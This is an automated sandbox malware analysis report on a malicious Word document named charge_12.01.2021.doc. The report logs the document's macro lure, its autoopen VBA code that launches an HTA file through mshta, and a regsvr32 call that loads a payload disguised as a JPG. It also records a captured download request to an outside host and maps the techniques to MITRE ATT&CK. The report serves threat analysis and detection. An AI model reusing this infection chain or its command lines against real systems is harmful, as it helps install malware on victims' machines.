Source: global traffic | HTTP traffic detected: GET /tegz/Q277aG7FkN9pAcaWDfFlGNBeuaqGed8i/baWexTQoGyAAzLR/AU1XErrU1FitjjV8BBaQuem65smQXYvyd/64063/g6fJYLGHRVWp7s1tvHnZdv/XcjcYCjBX8tPaALshiDAx85PEq/cab3?ref=0t&WzOZ=9xyAidN&z3d9Ob0=EwAUkUUNyHsk&user=4Zky89n&cid=bE5YBOFyZvWHbGv9wPr7QVm&q=lYkgZNGYoZpu9 HTTP/1.1
    Accept: */*
    Accept-Language: en-us
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: winrentals2017b.com
    Connection: Keep-Alive

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 | Screenshot OCR: Enable editing" button on the top bar, and then click 'Enable content" Page1 of 1 116words 112 O
Source: Screenshot number: 4 | Screenshot OCR: Enable content" Page1 of 1 116words 112 O Type here to search Ki E a a g wg m % - I + lOW, 'f
Source: Screenshot number: 8 | Screenshot OCR: Enable editing" button on the top bar, and then click 'Enable content" Page1 of 1 116words It? O
Source: Screenshot number: 8 | Screenshot OCR: Enable content" Page1 of 1 116words It? O Type here to search Ki E a a g wg m % - I + 100% 'f
Document contains an embedded VBA macro which may execute processes
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function s, API IWshShell3.exec("explorer youTube.hta")
Source: charge_12.01.2021.doc | OLE indicator application name: unknown
Source: ~WRF{982F1FC3-FE5F-460D-815F-F7FB76116FDC}.tmp.1.dr | OLE indicator application name: unknown
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | Code function: 1_2_10863732
Source: charge_12.01.2021.doc | OLE, VBA macro line: Public Sub autoopen()
Source: VBA code instrumentation | OLE, VBA macro: Module main, Function autoopen
Source: ~WRF{982F1FC3-FE5F-460D-815F-F7FB76116FDC}.tmp.1.dr | OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: charge_12.01.2021.doc | OLE indicator has summary info: false
Source: ~WRF{982F1FC3-FE5F-460D-815F-F7FB76116FDC}.tmp.1.dr | OLE indicator has summary info: false
Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: sfc.dll
Source: charge_12.01.2021.doc | OLE indicator, VBA macros: true
Source: charge_12.01.2021.doc | OLE, VBA macro line: keywords = activedocument.builtindocumentproperties("keywords").value
Source: charge_12.01.2021.doc | ReversingLabs: Detection: 29%
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: unknown | Process created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | Process created: C:\Windows\SysWOW64\explorer.exe explorer youTube.hta
Source: unknown | Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\Documents\youTube.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" c:\users\public\dowNext.jpg
Source: C:\Windows\SysWOW64\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\{55D9ACF0-6563-4AA9-BDA1-49018F8DF26E} - OProcSessId.dat
Source: classification engine | Classification label: mal100.expl.evad.winDOC@8/16@1/1
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | File read: C:\Users\desktop.ini
Source: charge_12.01.2021.doc | OLE document summary: title field not present or empty
Source: charge_12.01.2021.doc | OLE document summary: edited time not present or 0
Source: ~WRF{982F1FC3-FE5F-460D-815F-F7FB76116FDC}.tmp.1.dr | OLE document summary: title field not present or empty
Source: ~WRF{982F1FC3-FE5F-460D-815F-F7FB76116FDC}.tmp.1.dr | OLE document summary: author field not present or empty
Source: ~WRF{982F1FC3-FE5F-460D-815F-F7FB76116FDC}.tmp.1.dr | OLE document summary: edited time not present or 0
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | Process created: C:\Windows\SysWOW64\explorer.exe
Source: unknown | Process created: C:\Windows\explorer.exe
Source: C:\Windows\SysWOW64\mshta.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | File opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: charge_12.01.2021.doc | Initial sample: OLE summary keywords = ath.ebuTuoy
Source: ~WRF{982F1FC3-FE5F-460D-815F-F7FB76116FDC}.tmp.1.dr | Initial sample: OLE indicators vbamacros = False

Data Obfuscation:

Source: C:\Windows\SysWOW64\mshta.exe | Code function: 7_2_0AA5C334 push eax; ret
Source: C:\Windows\SysWOW64\mshta.exe | Code function: 7_2_0AA5F114 push ebp; ret
Source: C:\Windows\SysWOW64\mshta.exe | Code function: 7_2_0AA5C364 pushfd ; ret
Source: C:\Windows\explorer.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exe; Process information set: NOOPENFILEERRORBOX
Source: explorer.exe, 00000006.00000002.563322432.00000000007E5000.00000004.00000020.sdmp; Binary or memory string: War&Prod_VMware_
Source: mshta.exe, 00000007.00000003.309220115.0000000009F0F000.00000004.00000001.sdmp, mshta.exe, 00000007.00000003.309451099.0000000009F0F000.00000004.00000001.sdmp, mshta.exe, 00000007.00000003.310098370.0000000009F0F000.00000004.00000001.sdmp, mshta.exe, 00000007.00000002.312858088.0000000009F0F000.00000004.00000001.sdmp; Binary or memory string: Hyper-V RAWAN Miniport (Network Monitor)-WFP Native MAC Layer LightWeight Filter-0000T?
Source: WINWORD.EXE, 00000001.00000002.569213146.000000000CFF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.568255480.000000000B290000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.569111011.000000000CFC2000.00000004.00000001.sdmp, mshta.exe, 00000007.00000003.309220115.0000000009F0F000.00000004.00000001.sdmp, mshta.exe, 00000007.00000003.309451099.0000000009F0F000.00000004.00000001.sdmp, mshta.exe, 00000007.00000003.310098370.0000000009F0F000.00000004.00000001.sdmp, mshta.exe, 00000007.00000002.312858088.0000000009F0F000.00000004.00000001.sdmp; Binary or memory string: Hyper-V RAW
Source: mshta.exe, 00000007.00000002.312828178.0000000009EDF000.00000004.00000001.sdmp, mshta.exe, 00000007.00000003.310080125.0000000009EDF000.00000004.00000001.sdmp, mshta.exe, 00000007.00000003.309434578.0000000009EDF000.00000004.00000001.sdmp; Binary or memory string: Hyper-V RAW_
Source: mshta.exe, 00000007.00000002.312828178.0000000009EDF000.00000004.00000001.sdmp, mshta.exe, 00000007.00000003.310080125.0000000009EDF000.00000004.00000001.sdmp, mshta.exe, 00000007.00000003.309434578.0000000009EDF000.00000004.00000001.sdmp; Binary or memory string: Hyper-V RAW`
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE; Code function: 1_2_0CC8E968 LdrInitializeThunk,
Source: C:\Windows\SysWOW64\mshta.exe; Process created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" c:\users\public\dowNext.jpg
Source: WINWORD.EXE, 00000001.00000002.563865384.0000000001A90000.00000002.00020000.sdmp, explorer.exe, 00000006.00000002.563580542.0000000000F60000.00000002.00020000.sdmp; Binary or memory string: Program Manager
Source: WINWORD.EXE, 00000001.00000002.563865384.0000000001A90000.00000002.00020000.sdmp, explorer.exe, 00000006.00000002.563580542.0000000000F60000.00000002.00020000.sdmp; Binary or memory string: Shell_TrayWnd
Source: WINWORD.EXE, 00000001.00000002.563865384.0000000001A90000.00000002.00020000.sdmp, explorer.exe, 00000006.00000002.563580542.0000000000F60000.00000002.00020000.sdmp; Binary or memory string: Progman
Source: WINWORD.EXE, 00000001.00000002.563865384.0000000001A90000.00000002.00020000.sdmp, explorer.exe, 00000006.00000002.563580542.0000000000F60000.00000002.00020000.sdmp; Binary or memory string: Progmanlock
Source: C:\Windows\SysWOW64\mshta.exe; Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exe; Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exe; Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exe; Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Windows\SysWOW64\explorer.exe; Directory queried: C:\Users\user\Documents

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Scripting 12 | DLL Side-Loading 1 | Process Injection 12 | Masquerading 1 | OS Credential Dumping | Query Registry 1 | Remote Services | Email Collection 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Exploitation for Client Execution 13 | Boot or Logon Initialization Scripts | DLL Side-Loading 1 | Disable or Modify Tools 1 | LSASS Memory | Security Software Discovery 1 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection 12 | Security Account Manager | Process Discovery 1 | SMB/Windows Admin Shares | Data from Local System 1 | Automated Exfiltration | Non-Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Scripting 12 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 12 | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Obfuscated Files or Information 1 | LSA Secrets | File and Directory Discovery 11 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | DLL Side-Loading 1 | Cached Domain Credentials | System Information Discovery 13 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label | Link
charge_12.01.2021.doc | 30% | ReversingLabs | Script-Macro.Trojan.Heuristic |
charge_12.01.2021.doc | 100% | Joe Sandbox ML | |

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source | Detection | Scanner | Label | Link
https://cdn.entity. | 0% | URL Reputation | safe |
https://rpsticket.partnerservices.getmicrosoftkey.com | 0% | URL Reputation | safe |
https://settings.outlook.comS | 0% | Avira URL Cloud | safe |
http://winrentals2017b.com/ | 0% | Avira URL Cloud | safe |
https://api.aadrm.com/ | 0% | URL Reputation | safe |
https://substrate.office.comgz | 0% | Avira URL Cloud | safe |
https://api.office.nets? | 0% | Avira URL Cloud | safe |
https://res.getmicrosoftkey.com/api/redemptionevents | 0% | URL Reputation | safe |
https://officeci.azurewebsites.net/api/ | 0% | URL Reputation | safe |
https://store.office.cn/addinstemplate | 0% | URL Reputation | safe |
https://substrate.office.comm | 0% | Avira URL Cloud | safe |
https://www.odwebp.svc.ms | 0% | URL Reputation | safe |
https://api.addins.store.officeppe.com/addinstemplate | 0% | URL Reputation | safe |
https://cortana.ai:$ | 0% | Avira URL Cloud | safe |
https://api.onedrive.comcent | 0% | Avira URL Cloud | safe |
https://devnull.onenote.comedOw | 0% | Avira URL Cloud | safe |
https://substrate.office.comc | 0% | Avira URL Cloud | safe |
https://ncus.contentsync. | 0% | URL Reputation | safe |
https://substrate.office.comL | 0% | Avira URL Cloud | safe |
https://substrate.office.comP | 0% | Avira URL Cloud | safe |
https://wus2.contentsync. | 0% | URL Reputation | safe |
https://api.cortana.aiD# | 0% | Avira URL Cloud | safe |
https://www.odwebp.svc.msom | 0% | Avira URL Cloud | safe |
https://outlook.office.com7 | 0% | Avira URL Cloud | safe |
https://asgsmsproxyapi.azurewebsites.net/6 | 0% | Avira URL Cloud | safe |
https://outlook.office.com1769 | 0% | Avira URL Cloud | safe |
https://dataservice.o365filtering.com:7P | 0% | Avira URL Cloud | safe |

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
winrentals2017b.com | 194.62.42.207 | true | false | | unknown

URLs from Memory and Binaries

                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://login.windows.net/common/oauth2/authorize/aWINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpfalse
                                                              high
                                                              https://login.windows.net/common/oauth2/authorize5FWWINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpfalse
                                                                high
                                                                https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drfalse
                                                                  high
                                                                  https://devnull.onenote.comedOwWINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://substrate.office.comcWINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://ncus.contentsync.WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://substrate.office.comLWINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/WINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417778990.0000000010906000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drfalse
                                                                    high
                                                                    http://weather.service.msn.com/data.aspxWINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drfalse
                                                                      high
                                                                      https://login.windows.net/common/oauth2/authorizeaEWINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpfalse
                                                                        high
                                                                        https://substrate.office.comPWINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drfalse
                                                                          high
                                                                          https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlWINWORD.EXE, 00000001.00000002.569040396.000000000CF4F000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drfalse
                                                                            high
                                                                            https://login.windows.net/common/oauth2/authorizeaWINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpfalse
                                                                              high
                                                                              https://login.windows.net/common/oauth2/authorizecWINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpfalse
                                                                                high
                                                                                https://wus2.contentsync.WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://login.windows.net/common/oauth2/authorizeeWINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpfalse
                                                                                  high
                                                                                  https://clients.config.office.net/user/v1.0/ios7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drfalse
                                                                                    high
                                                                                    https://login.windows.net/common/oauth2/authorizegWINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpfalse
                                                                                      high
                                                                                      https://api.cortana.aiD#WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://login.windows.net/common/oauth2/authorizeYWINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpfalse
                                                                                        high
                                                                                        https://login.windows.net/common/oauth2/authorizeZWINWORD.EXE, 00000001.00000003.417572350.000000001087D000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571214526.000000001087D000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292128544.0000000010877000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292417505.000000001087F000.00000004.00000001.sdmpfalse
                                                                                          high
                                                                                          https://o365auditrealtimeingestion.manage.office.comWINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drfalse
                                                                                            high
                                                                                            https://outlook.office365.com/api/v1.0/me/ActivitiesWINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drfalse
                                                                                              high
                                                                                              https://api.addins.omex.office.net/appstate/queryrWINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpfalse
                                                                                                high
                                                                                                https://www.odwebp.svc.msomWINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                https://clients.config.office.net/user/v1.0/android/policies7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drfalse
                                                                                                  high
                                                                                                  https://outlook.office.com7WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpfalse
